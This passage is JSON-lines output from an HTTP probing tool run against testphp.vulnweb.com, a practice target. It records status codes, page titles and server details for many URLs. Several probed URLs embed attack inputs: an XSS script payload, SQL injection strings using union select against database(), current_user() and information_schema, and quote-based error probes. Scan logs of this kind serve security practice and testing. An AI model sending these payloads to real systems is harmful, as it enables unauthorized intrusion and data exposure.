Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php/artists.php%20HTTP/%27\",\"time\":\"339.594794ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.724972122Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.php=\\\"\\u003e\\u003cscript\\u003ealert(2)\\u003c/script\\u003e\",\"input\":\"http://testphp.vulnweb.com:80/artists.php=%22%3E%3Cscript%3Ealert(2)%3C/script%3E\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php=%22%3E%3Cscript%3Ealert%282%29%3C/script%3E\",\"time\":\"349.115715ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.726122766Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.php/artists=1\",\"input\":\"http://testphp.vulnweb.com:80/artists.php/artists=1\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php/artists=1\",\"time\":\"344.186399ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.729860303Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.php/artists.php HTTP/1.1\",\"input\":\"http://testphp.vulnweb.com:80/artists.php/artists.php%20HTTP/1.1\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php/artists.php%20HTTP/1.1\",\"time\":\"352.411735ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.776825358Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.php=-1 union select 1,database(),current_user()\",\"input\":\"http://testphp.vulnweb.com:80/artists.php=-1%20union%20select%201,database(),current_user()\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php=-1%20union%20select%201,database%28%29,current_user%28%29\",\"time\":\"342.256568ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.808767062Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.php=-1 unionselect 1,table_name, 3 from information_schema.tables where table_scheme() limit0,1\",\"input\":\"http://testphp.vulnweb.com:80/artists.php=-1%20unionselect%201,table_name,%203%20from%20information_schema.tables%20where%20table_scheme()%20limit0,1\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php=-1%20unionselect%201,table_name,%203%20from%20information_schema.tables%20where%20table_scheme%28%29%20limit0,1\",\"time\":\"346.980996ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.816788491Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.php=1 order 2\",\"input\":\"http://testphp.vulnweb.com:80/artists.php=1%20order%202\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php=1%20order%202\",\"time\":\"350.590019ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.829606434Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.php=1\",\"input\":\"http://testphp.vulnweb.com:80/artists.php=1\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php=1\",\"time\":\"355.919354ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.906229922Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.php=1 union select 1\",\"input\":\"http://testphp.vulnweb.com:80/artists.php=1%20union%20select%201\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php=1%20union%20select%201\",\"time\":\"354.278385ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.942812397Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.php=1'\",\"input\":\"http://testphp.vulnweb.com:80/artists.php=1'\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php=1'\",\"time\":\"354.503439ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.949951731Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.php?artist%20=1\",\"input\":\"http://testphp.vulnweb.com:80/artists.php?artist%20=1\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist%20=1\",\"time\":\"343.391725ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":503,\"lines\":105,\"status_code\":200,\"content_length\":5328,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.997775265Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.php?artist=1\",\"input\":\"http://testphp.vulnweb.com:80/artists.php?artist=1\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1\",\"time\":\"356.955025ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":701,\"lines\":124,\"status_code\":200,\"content_length\":6251,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:21.025563338Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.php?artist=1'\",\"input\":\"http://testphp.vulnweb.com:80/artists.php?artist=1'\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1'\",\"time\":\"357.895711ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:21.068008997Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.php?artist=10\",\"input\":\"http://testphp.vulnweb.com:80/artists.php?artist=10\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=10\",\"time\":\"358.040011ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":482,\"lines\":105,\"status_code\":200,\"content_length\":4735,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:21.077879029Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.php?artist=2\",\"input\":\"http://testphp.vulnweb.com:80/artists.php?artist=2\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=2\",\"time\":\"349.240939ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":645,\"lines\":124,\"status_code\":200,\"content_length\":6193,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:21.140508157Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.php?artist=3\",\"input\":\"http://testphp.vulnweb.com:80/artists.php?artist=3\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=3\",\"time\":\"352.83239ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":645,\"lines\":124,\"status_code\":200,\"content_length\":6193,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:21.163721961Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.phpartists.php\",\"input\":\"http://testphp.vulnweb.com:80/artists.phpartists.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.phpartists.php\",\"time\":\"338.448666ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:21.214144609Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.phpfuckyou\",\"input\":\"http://testphp.vulnweb.com:80/artists.phpfuckyou\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.phpfuckyou\",\"time\":\"355.207909ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:21.219437319Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artistsdetails.php\",\"input\":\"http://testphp.vulnweb.com:80/artistsdetails.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artistsdetails.php\",\"time\":\"347.851423ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:21.242824686Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artistsnewsdetails.php\",\"input\":\"http://testphp.vulnweb.com:80/artistsnewsdetails.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artistsnewsdetails.php\",\"time\":\"360.986039ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:21.273467846Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/assets\",\"input\":\"http://testphp.vulnweb.com:80/assets\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/assets\",\"time\":\"340.373ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:21.347290537Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/bxss\",\"input\":\"http://testphp.vulnweb.com:80/bxss\",\"location\":\"http://testphp.vulnweb.com/bxss/\",\"title\":\"301 Moved Permanently\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/bxss\",\"time\":\"352.416449ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":301,\"content_length\":169,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:21.360030897Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/bxss/vuln.php\",\"input\":\"http://testphp.vulnweb.com:80/bxss/vuln.php?\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/bxss/vuln.php\",\"time\":\"353.838423ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":50,\"lines\":5,\"status_code\":200,\"content_length\":396,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:21.389374018Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/bxss/vuln.php?id=1\",\"input\":\"http://testphp.vulnweb.com:80/bxss/vuln.php?id=1\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/bxss/vuln.php?id=1\",\"time\":\"357.141518ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":50,\"lines\":5,\"status_code\":200,\"content_length\":396,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:21.409652669Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/cart.php\",\"input\":\"http://testphp.vulnweb.com:80/cart.php\",\"title\":\"you cart\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/cart.php\",\"time\":\"346.853146ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":502,\"lines\":109,\"status_code\":200,\"content_length\":4903,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:21.430721584Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/cart.php'\",\"input\":\"http://testphp.vulnweb.com:80/cart.php'\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/cart.php'\",\"time\":\"346.487843ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:21.525264968Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php\",\"time\":\"348.458331ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:21.556727164Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php '\",\"input\":\"http://testphp.vulnweb.com:80/categories.php%20'\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php%20%27\",\"time\":\"360.898088ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:21.579786554Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php\\u0026fcbz=1\",\"input\":\"http://testphp.vulnweb.com:80/categories.php\\u0026fcbz=1\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php\\u0026fcbz=1\",\"time\":\"343.289923ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:21.586255588Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php\\\"\",\"input\":\"http://testphp.vulnweb.com:80/categories.php%22\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php%22\",\"time\":\"351.14421ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:21.63017725Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php'\",\"input\":\"http://testphp.vulnweb.com:80/categories.php'\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php'\",\"time\":\"352.313128ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:21.794136387Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/artists.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/artists.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/artists.php\",\"time\":\"347.216832ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:21.799052964Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/cart.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/cart.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/cart.php\",\"time\":\"353.388123ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:21.803169233Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/AJAX/index.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/AJAX/index.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/index.php\",\"time\":\"345.859585ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:21.856128625Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/categories.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/categories.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/categories.php\",\"time\":\"350.483825ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:21.876793466Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/disclaimer.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/disclaimer.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/disclaimer.php\",\"time\":\"354.073334ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:21.884540937Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/index.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/index.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/index.php\",\"time\":\"350.579387ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:21.892849874Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/guestbook.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/guestbook.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/guestbook.php\",\"time\":\"353.760962ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:21.975325506Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/listproducts.php?cat=1\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/listproducts.php?cat=1\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/listproducts.php?cat=1\",\"time\":\"355.8836ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.021903527Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/listproducts.php?cat=2\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/listproducts.php?cat=2\",\"title\":\"picture 